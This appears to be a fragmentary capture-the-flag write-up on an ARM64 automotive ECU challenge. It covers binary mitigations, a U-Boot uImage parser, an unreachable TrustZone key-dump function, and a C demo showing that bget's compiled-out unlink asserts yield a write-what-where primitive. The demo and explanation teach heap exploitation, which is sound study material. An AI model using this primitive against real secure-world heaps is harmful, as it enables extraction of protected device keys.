libc puts @ 0xffff8256ebe0
Authentication token:

• Unpacking the distributed rootfs.cpio.uboot and exploring it turns up /home/user/ecu_auth_daemon:

cpio-root/home/user$ ls
ecu_auth_daemon  flag1  tz_gate

(tz_gate is described later.)

RELRO          STACK CANARY     NX          PIE     RPATH
Partial RELRO  No canary found  NX enabled  No PIE  No RPATH

• Mitigations on the binary (checksec output above): no stack canary, NX enabled, no PIE, Partial RELRO. No canary plus no PIE means a stack overflow in the daemon goes undetected and the binary's own code and GOT sit at fixed addresses; NX only rules out executing injected shellcode directly.
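The rootfs.cpio.uboot file named above is a cpio archive wrapped in a U-Boot legacy image ("uImage") header, so the first recon step is stripping and checking that header. The following is an added example, not code from the original write-up or from the challenge: a parser for the 64-byte uImage header that verifies the header and data CRC-32s and exposes the wrapped cpio, plus a builder used only to construct a sample image offline. The sample payload is a constructed, valid but empty newc cpio (just the TRAILER!!! record), and the os/arch/type/comp values it fills in are the U-Boot constants for a Linux AArch64 ramdisk.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* U-Boot legacy image ("uImage") header: 64 bytes, multi-byte fields big-endian.
 * rootfs.cpio.uboot is a cpio archive wrapped in exactly this header. */
#define IH_MAGIC        0x27051956u
#define IH_NMLEN        32
#define IH_HDR_LEN      64
#define IH_OS_LINUX     5
#define IH_ARCH_ARM64   22
#define IH_TYPE_RAMDISK 3
#define IH_COMP_NONE    0

struct uimage_hdr {
    uint32_t magic, hcrc, time, size, load, ep, dcrc;
    uint8_t  os, arch, type, comp;
    char     name[IH_NMLEN + 1];   /* NUL-terminated copy of ih_name */
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
}

/* Standard CRC-32 (reflected poly 0xEDB88320), the same crc32() mkimage uses via zlib. */
uint32_t crc32_buf(const uint8_t *buf, size_t len)
{
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        c ^= buf[i];
        for (int k = 0; k < 8; k++)
            c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return ~c;
}

/* Parses and verifies a uImage. On success, *payload/*payload_len locate the
 * wrapped data (here: the cpio archive) and the header fields are in *h. */
bool uimage_parse(const uint8_t *img, size_t img_len, struct uimage_hdr *h,
                  const uint8_t **payload, size_t *payload_len)
{
    if (img_len < IH_HDR_LEN || be32(img) != IH_MAGIC)
        return false;
    h->magic = be32(img);      h->hcrc = be32(img + 4);  h->time = be32(img + 8);
    h->size  = be32(img + 12); h->load = be32(img + 16); h->ep   = be32(img + 20);
    h->dcrc  = be32(img + 24);
    h->os = img[28]; h->arch = img[29]; h->type = img[30]; h->comp = img[31];
    memcpy(h->name, img + 32, IH_NMLEN);
    h->name[IH_NMLEN] = '\0';

    /* ih_hcrc is computed over the header with the hcrc field itself zeroed. */
    uint8_t tmp[IH_HDR_LEN];
    memcpy(tmp, img, IH_HDR_LEN);
    memset(tmp + 4, 0, 4);
    if (crc32_buf(tmp, IH_HDR_LEN) != h->hcrc)
        return false;
    /* Bound ih_size by what is actually present before trusting it. */
    if (h->size > img_len - IH_HDR_LEN)
        return false;
    if (crc32_buf(img + IH_HDR_LEN, h->size) != h->dcrc)
        return false;
    *payload = img + IH_HDR_LEN;
    *payload_len = h->size;
    return true;
}

/* Wraps data the way mkimage -A arm64 -O linux -T ramdisk -C none would;
 * used only to build the constructed sample. Returns image length, 0 on overflow. */
size_t uimage_build(uint8_t *out, size_t cap, const uint8_t *data, size_t len, const char *name)
{
    if (cap < IH_HDR_LEN + len)
        return 0;
    memset(out, 0, IH_HDR_LEN);
    put_be32(out, IH_MAGIC);
    put_be32(out + 12, (uint32_t)len);
    put_be32(out + 24, crc32_buf(data, len));
    out[28] = IH_OS_LINUX; out[29] = IH_ARCH_ARM64; out[30] = IH_TYPE_RAMDISK; out[31] = IH_COMP_NONE;
    strncpy((char *)out + 32, name, IH_NMLEN);
    memcpy(out + IH_HDR_LEN, data, len);
    put_be32(out + 4, crc32_buf(out, IH_HDR_LEN));   /* hcrc last, over the zeroed field */
    return IH_HDR_LEN + len;
}

/* Constructed sample payload: a valid newc-format cpio holding only the
 * TRAILER!!! record (110-byte header + name, padded to a 4-byte boundary). */
static const uint8_t k_empty_cpio[] =
    "070701" "00000000" "00000000" "00000000" "00000000" "00000001" "00000000"
    "00000000" "00000000" "00000000" "00000000" "00000000" "0000000B" "00000000"
    "TRAILER!!!\0\0\0\0";
#define EMPTY_CPIO_LEN (sizeof k_empty_cpio - 1)

struct uimage_hdr g_hdr;   /* filled by demo_roundtrip() */

/* Builds a uImage around the sample cpio, parses it back, checks the payload survives. */
bool demo_roundtrip(void)
{
    uint8_t img[256];
    const uint8_t *p; size_t plen;
    size_t n = uimage_build(img, sizeof img, k_empty_cpio, EMPTY_CPIO_LEN, "rootfs");
    if (n == 0 || !uimage_parse(img, n, &g_hdr, &p, &plen))
        return false;
    return plen == EMPTY_CPIO_LEN && memcmp(p, k_empty_cpio, plen) == 0;
}

/* A single flipped payload byte must be caught by ih_dcrc. */
bool demo_tamper_detected(void)
{
    uint8_t img[256];
    const uint8_t *p; size_t plen;
    struct uimage_hdr h;
    size_t n = uimage_build(img, sizeof img, k_empty_cpio, EMPTY_CPIO_LEN, "rootfs");
    img[IH_HDR_LEN + 20] ^= 0x01;
    return n != 0 && !uimage_parse(img, n, &h, &p, &plen);
}

int main(void)
{
    printf("roundtrip: %s, tamper detected: %s\n",
           demo_roundtrip() ? "ok" : "FAIL", demo_tamper_detected() ? "ok" : "FAIL");
    return 0;
}
```

On the real file, read it into memory, call uimage_parse and write the payload out, then unpack it with cpio -idm; the quick equivalent, since the legacy header is always 64 bytes, is dd bs=64 skip=1 if=rootfs.cpio.uboot of=rootfs.cpio, which skips the CRC checks that the parser performs.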
TODO: Remove this before the final vehicle release!!!
 * Edit: Actually, it's not connected to the TA dispatcher,
 * so it's uncallable from the Normal World anyway. Safe to ignore. :)
 */
static TEE_Result debug_dump_oem_root_key(void *challenge, uint32_t len)
{
    TEE_ObjectHandle object = TEE_HANDLE_NULL;
    TEE_ObjectInfo object_info;
    TEE_Result res;
    uint32_t read_bytes = 0;

    IMSG("[CRITICAL WARNING] Executing Factory Key Dump API!");
    (omitted)

• The TA contains a function that would be a "win" if it could be called, but nothing calls it: it is not wired into the TA's command dispatcher, so it cannot be reached through tz_gate either. Note that "not reachable from the dispatcher" is not the same as "not reachable": the function is still linked into the TA image, so any control-flow hijack inside the TA can jump to it.
/* The buffer is free.  Remove it from the free list and add
   its size to that of our buffer. */
assert(BH((char *) bn + bn->bh.bsize)->prevfree == bn->bh.bsize);
assert(bn->ql.blink->ql.flink == bn);
assert(bn->ql.flink->ql.blink == bn);
bn->ql.blink->ql.flink = bn->ql.flink;
bn->ql.flink->ql.blink = bn->ql.blink;

• The relinking (unlink) spot in bget.c. There are asserts guarding it, but they disappear in a release build (assert() expands to nothing once NDEBUG is defined), so the two pointer writes run unconditionally on whatever flink/blink values the chunk header holds.
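To make the consequence of the compiled-out asserts concrete, here is an added example written for this edit; it is not code from the write-up, from OP-TEE or from bget.c. It reproduces the bget free-buffer layout (bhead followed by the qlinks), implements the splice once with the three assert conditions evaluated at run time and once without them, and builds a constructed arena, free-list sentinel, pointer slot and scratch area (all assumptions for the demo, not the real secure-world heap) to show that a chunk whose links were overwritten is rejected in the checked path but turns into a write-what-where in the unchecked one.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef long bufsize;

/* Free-buffer layout as in bget.c: the buffer header (prevfree/bsize) is
 * followed by the doubly-linked free-list links. */
struct bfhead;
struct qlinks { struct bfhead *flink; struct bfhead *blink; };
struct bhead  { bufsize prevfree; bufsize bsize; };
struct bfhead { struct bhead bh; struct qlinks ql; };
#define BH(p) ((struct bhead *)(p))

/* The three assert() conditions from bget.c, evaluated at run time. */
static bool unlink_checks_pass(const struct bfhead *bn)
{
    if (BH((char *)bn + bn->bh.bsize)->prevfree != bn->bh.bsize) return false; /* next buffer agrees we are free */
    if (bn->ql.blink->ql.flink != bn) return false;   /* predecessor points back at us */
    if (bn->ql.flink->ql.blink != bn) return false;   /* successor points back at us */
    return true;
}

/* What a release build executes: the splice, unconditionally. Two pointer-sized
 * writes to addresses taken straight from the chunk's own link fields. */
static void unlink_release(struct bfhead *bn)
{
    bn->ql.blink->ql.flink = bn->ql.flink;
    bn->ql.flink->ql.blink = bn->ql.blink;
}

/* What a debug build executes: refuse to splice a chunk whose links are inconsistent. */
static bool unlink_debug(struct bfhead *bn)
{
    if (!unlink_checks_pass(bn)) return false;
    unlink_release(bn);
    return true;
}

/* Constructed demo state (assumption, not the real OP-TEE heap): an arena with one free
 * chunk and the following buffer's header, the free-list sentinel, a struct whose pointer
 * slot sits at the offset of ql.blink, and a writable scratch area. */
static _Alignas(16) unsigned char g_arena[128];
static struct bfhead g_freelist;
struct target { unsigned char pad[24]; void *handler; };   /* handler stands in for a function pointer */
_Static_assert(offsetof(struct bfhead, ql.blink) == 24, "demo assumes 64-bit bget layout");
static struct target g_target;
static _Alignas(16) unsigned char g_scratch[64];            /* stands in for attacker-controlled data */

/* One free chunk of 64 bytes at the start of the arena; the header of the buffer
 * that follows records prevfree = 64, so the first assert condition holds. */
static struct bfhead *arena_free_chunk(void)
{
    memset(g_arena, 0, sizeof g_arena);
    struct bfhead *bn = (struct bfhead *)g_arena;
    bn->bh.bsize = 64;
    BH(g_arena + 64)->prevfree = 64;
    return bn;
}

/* Honest free list: sentinel <-> bn. Debug unlink accepts it and the sentinel ends up empty. */
bool demo_legit_unlink(void)
{
    struct bfhead *bn = arena_free_chunk();
    memset(&g_freelist, 0, sizeof g_freelist);
    g_freelist.ql.flink = g_freelist.ql.blink = bn;
    bn->ql.flink = bn->ql.blink = &g_freelist;
    if (!unlink_debug(bn)) return false;
    return g_freelist.ql.flink == &g_freelist && g_freelist.ql.blink == &g_freelist;
}

/* Simulates an overflow from the adjacent buffer that overwrote bn's links:
 * flink -> g_target (so &flink->ql.blink == &g_target.handler), blink -> g_scratch. */
static struct bfhead *forge_chunk(void)
{
    struct bfhead *bn = arena_free_chunk();
    memset(&g_target, 0, sizeof g_target);
    memset(g_scratch, 0, sizeof g_scratch);
    bn->ql.flink = (struct bfhead *)&g_target;
    bn->ql.blink = (struct bfhead *)g_scratch;
    return bn;
}

/* Debug build: the back-pointer checks fail and nothing is written. */
bool demo_forged_unlink_detected(void)
{
    struct bfhead *bn = forge_chunk();
    return !unlink_debug(bn) && g_target.handler == NULL;
}

/* Release build: the splice becomes a write-what-where. Returns g_target.handler afterwards
 * (now g_scratch); the collateral write put &g_target at g_scratch + 16 (the flink slot). */
void *demo_forged_unlink_release(void)
{
    struct bfhead *bn = forge_chunk();
    unlink_release(bn);
    void *now;
    memcpy(&now, &g_target.handler, sizeof now);   /* byte copy: no aliasing assumptions */
    return now;
}

int main(void)
{
    printf("legit unlink ok: %d\n", demo_legit_unlink());
    printf("forged chunk rejected by checks: %d\n", demo_forged_unlink_detected());
    printf("handler after release unlink: %p (scratch at %p)\n",
           demo_forged_unlink_release(), (void *)g_scratch);
    return 0;
}
```

The second write (flink->ql.blink = blink) is the one an attacker aims: choosing flink so that flink + 24 lands on a pointer slot stores blink there. The first write (blink->ql.flink = flink) is the price: blink + 16 must be writable, which is why the value stored has to point at attacker-reachable memory rather than, say, directly into code.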